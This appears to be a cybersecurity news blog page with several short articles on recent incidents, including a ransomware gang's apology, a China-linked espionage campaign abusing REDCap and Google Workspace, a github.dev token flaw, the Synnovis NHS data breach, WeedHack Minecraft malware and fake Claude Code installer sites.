Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Latest News

Crypto Exploit Losses Plummet 90% in May to $68.3 Million as Thieves Hit Security Wall

  Crypto thieves are hitting a major wall, with exploit losses plunging nearly 90% in May 2026. Blockchain security firm CertiK reported tha...

All the recent news you need to know
cybersecurity attacks
CIS Cyber Attacks Cyber Criminals Cyber Gangs Cyber Security Ransomware Attacks cybercrime gangs cybersecurity attacks

Ransomware Gang Apologizes After Mistakenly Attacking CIS Company and Revealing Criminal Errors

 

Surprisingly, even cybercriminal collectives slip up sometimes - a fact highlighted when attackers struck a business inside a CIS country. A misstep by Nova, tied to the RAlord network, led to unintended consequences. Following an accidental hit on Eriell Group - an oilfield services leader based in Tashkent with operations extending into Russia - affiliates backtracked publicly. The group formally expressed regret over targeting such a firm. Apologies emerged only after internal protocols appeared breached. Mistaken identity seems to have triggered the reversal. Trust among criminal actors likely took a quiet blow. 

Reports indicate that after Eriell reached out to Nova, alerting them to the mistake, the link between the operator and the group was cut. Banned soon afterward, the individual involved lost access entirely. Instead of resistance, there came an apology - structured, deliberate. Assistance followed, provided freely, framed as support rather than restitution. Their stance: encryption never happened, data remains unpublished, intent unclear but outwardly cooperative. Still, the unwritten code among major ransomware groups holds: steer clear of Russian and broader CIS networks. 

Even though hacking violates local laws there, officials routinely ignore profit-driven breaches if they spare homegrown entities. Some hacking collectives like DragonForce, VanHelsing, and LockBit ban strikes on Russian-linked targets. Despite that, the Nova member tied to the Eriell breach probably won’t earn trust among peers again quickly. Though rules exist, breaking unwritten loyalties carries consequences few overlook. It's happened before - threat actors stumbling through avoidable errors. 

Back then, a ransom-driven team called Scattered Lapsus$ Hunters announced full control over Resecurity, a firm focused on digital defense, boasting they’d extracted every piece of stored information. In reality, their intrusion led straight into a trap set long in advance: a decoy system designed to mislead. That slip gave authorities what they needed - not just tracking one participant but securing legal grounds to pursue evidence further. 

Besides earlier cases, attention turned to CyberVolk - a pro-Russian hacktivist collective - that rolled out ransomware yet embedded the primary decryption keys directly within the code. Because of this oversight, those affected found a way to unlock data freely, bypassing any payment. Mistakes like these undermined the entire scheme before it gained traction. Wrong moves in coding sometimes backfire. 

The team behind Sicarii built a system that made fresh encryption keys on each launch - yet wiped the matching private key right after. Because of this, users had no way to unlock data, payment or not. In another case, Nitrogen’s tool failed due to a nearly identical error, leaving its decryption method useless. Paying up became meaningless when recovery was impossible by design. Certain missteps reveal a different side - those behind cyberattacks aren’t flawless. 

Though often seen as highly skilled, people running ransomware schemes act mainly for money; yet just like others, they slip up, leaving openings that can unexpectedly help those targeted.
Read more »
UNC6508
China cyber espionage Google Threat Intelligence Group INFINITERED malware REDCap UNC6508

China-Linked Cyber Espionage Group Secretly Harvested Research and Defense Emails from North American Institutions

 

A sophisticated cyber espionage campaign linked to China infiltrated research, healthcare, academic, and military organizations across North America, remaining undetected for more than a year while stealing sensitive information and defense-related communications.

According to a recent report from Google’s Threat Intelligence Group (GTIG), the campaign has been attributed with high confidence to a threat cluster identified as UNC6508. The attackers gained access through compromised REDCap (Research Electronic Data Capture) servers and later leveraged built-in Google Workspace features to quietly collect targeted emails.

The threat actor and its custom malware, known as INFINITERED, were previously highlighted by Google in February during a broader assessment of state-sponsored attacks targeting the defense industry. While the affected organizations were not publicly named, the victims reportedly included healthcare providers, universities, military medical institutions, advocacy organizations, and regulatory agencies in the United States and Canada. Google stated that it alerted impacted entities and took action against the attackers’ infrastructure.

The attackers targeted externally accessible REDCap servers, a widely used platform that helps hospitals, research institutions, and universities manage study data and databases.

Although Google has not identified the precise method used to gain initial access, nor linked the activity to a specific vulnerability or CVE, investigators observed the group scanning older REDCap versions known to contain security weaknesses.

Roughly three months after breaching the servers, UNC6508 deployed INFINITERED, a customized malware strain designed to modify REDCap system files. The malware ensured long-term persistence by embedding itself into the platform’s update process, allowing malicious code to survive future software upgrades.

INFINITERED also captured usernames and passwords entered through REDCap login portals and stored the stolen credentials in encrypted form within local databases. Additionally, the malware functioned as a backdoor, accepting commands through HTTP cookies and executing them whenever users loaded web pages.

Researchers traced the earliest known compromise to September 2023, with malicious activity continuing through November 2025. After establishing a foothold, the attackers conducted network reconnaissance, collected database and service account credentials, and eventually escalated privileges to obtain domain administrator access.

Rather than deploying a separate data-exfiltration tool, the attackers exploited an existing Google Workspace administrative capability known as content compliance rules.

These rules are typically used by organizations to monitor emails for specific keywords and automatically apply actions such as forwarding or copying messages. UNC6508 created a malicious rule named "Patroit" that monitored nearly 150 keywords, email addresses, and search terms associated with its intelligence-gathering objectives.

Whenever an email matched the predefined criteria, Google Workspace automatically sent a hidden copy to an attacker-controlled Gmail account. Google has since disabled the account involved in the operation.

This technique allowed the threat actors to collect sensitive communications without installing malware on mail servers or generating suspicious network traffic. Instead, they relied entirely on legitimate cloud-based functionality to siphon information.

While email-forwarding rule abuse is already recognized within the MITRE ATT&CK framework, GTIG noted that using domain-level content compliance rules for espionage represented a previously unseen tactic among China-linked cyber actors.

Analysis of the monitoring rules revealed that UNC6508 was particularly interested in subjects related to geopolitical strategy, military technologies and equipment, artificial intelligence, autonomous and uncrewed systems, offensive cyber operations, and medical research.

One especially notable keyword was "chikungunya," a mosquito-borne disease linked to a significant outbreak in China's Guangdong province during 2025, suggesting the group's collection interests extended into public health and epidemiological research.

Security teams are advised to immediately update internet-facing REDCap servers and completely remove outdated software versions. Because REDCap allows multiple versions to operate simultaneously, legacy installations can create opportunities for downgrade attacks that exploit known vulnerabilities.

Organizations should also review Google Workspace and other cloud email environments for unusual content compliance rules, unauthorized mail forwarding settings, and external BCC destinations. Administrative audit logs should be examined to identify when rule changes occurred and who made them.

Google has also published indicators of compromise associated with INFINITERED, which defenders can use to search for signs of intrusion within their environments. Implementing phishing-resistant multi-factor authentication (MFA) for administrator accounts is another critical step, as the email theft operation ultimately depended on obtaining elevated administrative privileges.

Although investigators have not yet determined exactly how UNC6508 initially compromised the REDCap servers, the campaign demonstrates how legitimate cloud administration features can be weaponized once attackers gain sufficient access. As a result, organizations must monitor not only malware and network activity but also the misuse of trusted enterprise tools that can quietly facilitate data theft.

Read more »
Zero day
Authentication Tokens CVE Data Breach GitHub Access Token malicious VS Code extensions Microsoft vulnerability Zero day

Researcher Reveals VS Code Flaw That Could Expose GitHub Access Tokens Through a Single Click

A publicly disclosed security flaw affecting the browser-based version of Visual Studio Code has drawn attention from developers after a researcher demonstrated how attackers could potentially obtain GitHub authentication tokens through a single user interaction.

The issue was disclosed by security researcher Ammar Askar, who published technical details alongside proof-of-concept code showing how the vulnerability could be abused. At the time of disclosure, no CVE identifier had been assigned and Microsoft had not released an official software patch.

According to Askar's analysis, the weakness exists within github.dev, GitHub's web-based development environment that allows users to work with repositories directly from a browser using technology derived from Visual Studio Code. The attack takes advantage of the way VS Code's webview components communicate with the main editor environment.

Webviews are embedded browser windows used by extensions and web applications to display interactive content. While these components are designed to operate within restricted environments, the researcher found a method to abuse the message-passing mechanism that connects a webview to the editor interface.

The published demonstration shows how malicious JavaScript running inside a webview can trigger actions within the main editor window. By simulating keyboard input and user activity, the code can install a malicious extension without requiring the victim to manually perform the installation process.

Once deployed, the extension is capable of extracting a GitHub OAuth token that is transmitted when users access github.dev. OAuth tokens act as authorization credentials that allow applications to interact with GitHub services on behalf of authenticated users.

According to the researcher, the security concern extends beyond access to a single repository. The token passed to github.dev can inherit the permissions associated with the user's GitHub account, potentially granting access to every repository available to that account, including private projects.

Using the proof-of-concept attack, a malicious extension can retrieve the token and communicate with GitHub's API. This allows an attacker to identify repositories accessible to the compromised account and gather information about private development resources.

Askar argued that the broad permissions associated with the token significantly increase the potential impact of exploitation because access is not limited to the repository that initially triggered the github.dev session.

To reduce exposure while no official fix was available, the researcher advised users to clear cookies and locally stored site data associated with github.dev. Removing this stored data forces additional authentication checks that can help expose suspicious sign-in attempts.

After clearing the stored information, users attempting to access github.dev through a malicious link would be more likely to encounter a warning indicating that the GitHub Repositories extension is requesting authorization through GitHub. Such prompts can serve as an indication that unexpected account access is being requested.

The disclosure also highlighted ongoing tensions surrounding vulnerability reporting processes. Askar stated that GitHub was notified approximately one hour before publication of the research. He described the disclosure as a deliberate decision to release the information publicly rather than pursue a lengthy coordinated disclosure process.

The researcher cited previous interactions involving another VS Code vulnerability that he reported through Microsoft's security channels. According to his account, the issue was later addressed without attribution and was classified as having no security impact despite his concerns regarding its implications.

Askar said that experience influenced his decision to publicly disclose future VS Code security findings rather than continue working through Microsoft's reporting process.

The incident follows several other public disclosures involving Microsoft products by an independent researcher operating under the online alias "Nightmare Eclipse." Over recent months, that researcher has released details regarding multiple unpatched vulnerabilities affecting Windows and related Microsoft technologies, including flaws known as BlueHammer, RedSun, GreenPlasma, MiniPlasma, YellowKey, and UnDefend.

Some of those vulnerabilities were later reported as being actively exploited, further intensifying discussions within the security community about vulnerability handling, disclosure timelines, and communication between vendors and independent researchers.

Microsoft previously responded to some of those disclosures by warning that legal action could be considered when individuals engage in activities that cause harm to customers. The company also stated that it may cooperate with law enforcement agencies when necessary.

In comments provided following the publication of the VS Code findings, Microsoft emphasized the role independent researchers play in improving product security. The company stated that it remains committed to evaluating reported issues, coordinating engineering responses, and delivering mitigations intended to protect customers.

A subsequent statement from Microsoft indicated that the issue had been mitigated within its services and that users were not required to take additional action.

The developer-focused platforms remain attractive targets because authentication tokens can provide access to source code repositories, development environments, and organizational assets. Security teams generally recommend reviewing unexpected links carefully, limiting unnecessary permissions, monitoring account activity, and using strong authentication controls to reduce the likelihood of unauthorized access.

Read more »
Healthcare
affected patients Breach Cyber Breach Cyber Security Healthcare

Healthcare Cyber Breach Raises Concerns After 33,000 Patients Affected

 


Initially perceived as a supply-chain disruption within the UK healthcare ecosystem, the ransomware attack has now revealed an even more severe and long-lasting impact on patient privacy. A cybercriminal attack on pathology services provider Synnovis two years ago has caused Bedfordshire Hospitals NHS Foundation Trust to confirm that sensitive data related to over 33,000 individuals has been stolen and published. 

The exposed records come from administrative pathology files associated with laboratory and diagnostic testing conducted between 2011 and 2020, and may contain personal information and clinical test results. 

 Despite the fact that ransomware incidents have long been associated with operational disruption, they present long-term data protection challenges for healthcare organizations. Moreover, attacks on critical third-party suppliers supporting essential NHS services pose cascading risks. Following the June 2024 ransomware incident, Synnovis and relevant healthcare organizations conducted an extensive forensic review to determine the extent of the exposure. 

Bedfordshire Hospitals Foundation Trust informed the affected individuals after receiving confirmation that data associated with approximately 32,927 patients had been identified in material exfiltrated by the attackers and distributed on dark web sites. According to the trust, delayed disclosure was primarily driven by the complexity of the investigation rather than a newly discovered breach. This compromised dataset consisted of fragmented administrative records dispersed across several sources, as opposed to conventional datasets stored in structured repositories. For the contents and organizational ownership of these files to be determined, more than a year of specialist analysis was required. 

According to the review, historical pathology-related information spanning nearly a decade predating November 2020 may have been exposed, including patient names, dates of birth, NHS and patient identification numbers, postcodes, and diagnostic test results. Researchers find it difficult to assess cyber incidents involving unstructured healthcare data due to the difficulty of accurately mapping stolen information before the full impact can be understood on affected individuals. After notifications had been sent to the affected individuals, the focus shifted from forensic reconstruction to risk mitigation. 

Bedfordshire Hospitals Foundation Trust urged patients to remain vigilant for suspicious communications, advising them not to respond to unexpected requests for personal information, to avoid opening attachments or links from sources that are unfamiliar, and to be cautious when receiving unsolicited phone calls, emails, or text messages that reference healthcare information. 

It is acknowledged that disclosures of such information may cause concern, however the trust emphasised that the compromise was a result of an external pathology supplier's systems rather than its own network infrastructure, reiterating that it is committed to supplier oversight and data protection governance. However, cybersecurity professionals have expressed criticism regarding the delay of the disclosure. 

It has been argued by Saif Abed, founding partner of the AbedGraham Group, that a two-year gap between the incident and patient notification raises serious questions regarding the accountability of all organizations involved in the attack. Furthermore, he challenged suggestions that the fragmented nature of the stolen records significantly reduces risk. In his view, modern threat actors are equipped to aggregate, analyse, and correlate disparate datasets with greater ease. 

In Abed's opinion, once healthcare data enters criminal ecosystems, they are more likely to be misused than when the original breach occurred. This leaves affected individuals with limited recourse and raises concerns as to whether systemic lessons from the Synnovis incident have been adequately addressed. Several of his concerns are echoed by those he expressed last year for a formal public inquiry into the ransomware attack, as they relate to broader concerns regarding third-party cyber risk, breach transparency, and the resilience of critical healthcare supply chains. Despite the restoration of disrupted systems and the fading of headlines, the consequences of cyberattacks often persist. 

It is critical for healthcare organizations to maintain cyber resilience in the face of complex networks of third-party providers as visibility into supply chain security, timely breach assessment, and transparent communication remain critical. As a result of the case, patients need to remain vigilant against phishing attempts and identity-based fraud, while healthcare leaders need to reinforce the importance of continuously monitoring external partners whose information is sensitive. 

This incident demonstrates that maintaining patient trust throughout the healthcare ecosystem involves much more than simply adhering to technical requirements.
Read more »
Minecraft
Cyber Attacks data security Data Stealer Discord user data leak Malicious Apps Malware attacks Minecraft

WeedHack Malware Infects Over 116,000 Minecraft Players Through Fake Mods and Cheats

 

Early this year, a large-scale digital attack named WeedHack began spreading, tricking more than 116,000 Minecraft players worldwide. Instead of harmless add-ons, what seemed like useful mods carried hidden malicious software. Often, victims found these files through deceptive video guides or altered web searches promising better performance. Behind the scenes, once installed, the malware quietly pulled usernames, passwords, and crypto wallets from infected devices. 

Though warnings have been issued, experts confirm the operation is still active - expanding its reach steadily. Over 116,000 devices now show signs of intrusion by WeedHack, according to McAfee. Daily infection rates climb between two thousand and three thousand fresh cases. The United States, Germany, India, and the United Kingdom account for most affected users. Analysis revealed a network built on over 240 harmful web links. Close to 3,820 distinct JAR files were tied directly to distribution efforts. 

YouTube dominates how users encounter these threats, alongside skewed search outcomes. Hidden inside video descriptions or comment sections, harmful links promote counterfeit Minecraft modifications. Appearances deceive - some productions include polished narration and real-looking game scenes. Their legitimacy grows when large audiences watch, boosting visibility for players seeking add-ons. Not stopping there, attackers also twist how search results appear. 

When someone looks up reliable software such as Meteor Client or Radium Client, fraudulent pages rise to the front. Because real modifications often live solely on GitHub without proper web addresses, fraudsters take advantage of that emptiness. Looking nearly identical to authentic sources, these imitation platforms blur the line between secure and risky picks. 

Surprisingly, McAfee spotted a harmful website showing alerts about counterfeit Skytils downloads - yet it also included links to authentic GitHub and Discord sources. Even though the layout seemed reliable, visitors were handed corrupted files without their knowledge. Users ended up running malicious software, misled by the site’s convincing appearance. Unlike most infostealers, WeedHack runs in plain sight - offering its tools via a malware-for-hire model. 

Its visible control panel allows access to compromised systems. Data taken from victims appears there, clear and sorted. From that interface, new harmful setup files can be built, targeting Minecraft builds numbered 1.21.0 up to 1.21.10. Stolen details include Minecraft session tokens, saved browser passwords, and active cookies. Access extends to Discord, Steam, Telegram logins without consent. 

Cryptocurrency wallets get targeted too - data pulled silently. Screenshots captured behind the user's back round out basic features. Priced at five dollars monthly or twenty-five once, enhanced tools unlock next. Remote desktop viewing arrives with payment. Webcam operation follows closely after. Keystrokes recorded continuously come included. Control over a victim’s command line appears in paid tier. Managing files remotely completes the package. 

Over eight hundred members are part of WeedHack’s Telegram community, studies indicate. Though some seem underage, a number act through its online interface to target others or access personal data. Most security specialists suggest grabbing mods solely from verified platforms, checking URLs thoroughly - while skipping any JARs sitting on shady domains. When it comes to add-ons with fewer dangers, Minecraft’s built-in marketplace tends to be the safest path available.
Read more »
Technology
AI Claude Crypto Data Malware Attack Technology

Hackers Exploit Fake Claude Code Installers and Install Malware


Developers looking into Claude Code deployment instructions could be lured into an advanced malware campaign that hides itself as a genuine AI tooling documentation. 

Fake Claude code exploit

Experts found a few fake Claude Code and developer platform websites built to steal credentials, cryptocurrency, and API keys.

According to Straiker researchers, “the attack chain runs on the same unchecked trust that makes AI developer tools so easy to adopt.  “You copy a command. You paste it in your terminal. By then, it’s already too late,” said Straiker researchers in their analysis of the campaign. 

Highlights of the fake Claude code campaign 

1. Experts found over 88 fake domains mimicking Claude Code and other developer sites. The campaign utilises SEO infection and Google ads to deploy malicious install web pages over genuine documentation.

2. Threat actors hide infected commands within genuine installation commands, without impacting the deployment process.

3. The malware particularly attacks AI-based assets such as cloud development credentials, API keys, and verification tokens.

About the credential theft campaign 

The campaign attacked users of famous AI and developer tools, such as Claude Code, JetBrains, Perplexity Comet, and Cline. 

As per the experts, the operation depends on over 88 domains hosted throughout genuine platforms and constantly shuffles infrastructure, letting malicious sites to immediately resurface after shutdowns. To trap targets, threat actors use redirect chains, SEO poisoning and paid Google ads that place scammed installations over genuine documentation in search results.

These websites closely impersonate genuine vendor resources and demonstrate installation commands that look genuine but include hidden separators, such as “&,” that launch malicious actions along with the expected software deployment.

In various incidents, the genuine command still runs effectively, helping hide the hack.

Delivery of malware and launch tactics

Experts found various delivery techniques, such as rundll32.exe loading infected DLLs, Base64-encoded commands, mshta.exe abuse, JavaScript-based payloads, and GitHub-hosted scripts. 

By such techniques, hackers improve their potential to escape convention detection tools. Contrary to infostealers, the campaign pick on AI assets like authentication tokens, API Key, and cloud development credentials from tools such as Continue[.]dev, Cline. 

After execution, the malware uses a multi-level malicious chain that features encoded C2 communications, anti-analysis capabilities, fileless execution tactics, and credential theft functions.

Experts found the primary payload as ACRStealer, a malware family that steals information and has developed to include sophisticated encryption and escape tactics. Experts also identified a cryptocurrency clipboard hacker that rediverts transactions by replacing copied wallet addresses.

Read more »
Subscribe to: Posts (Atom)

Featured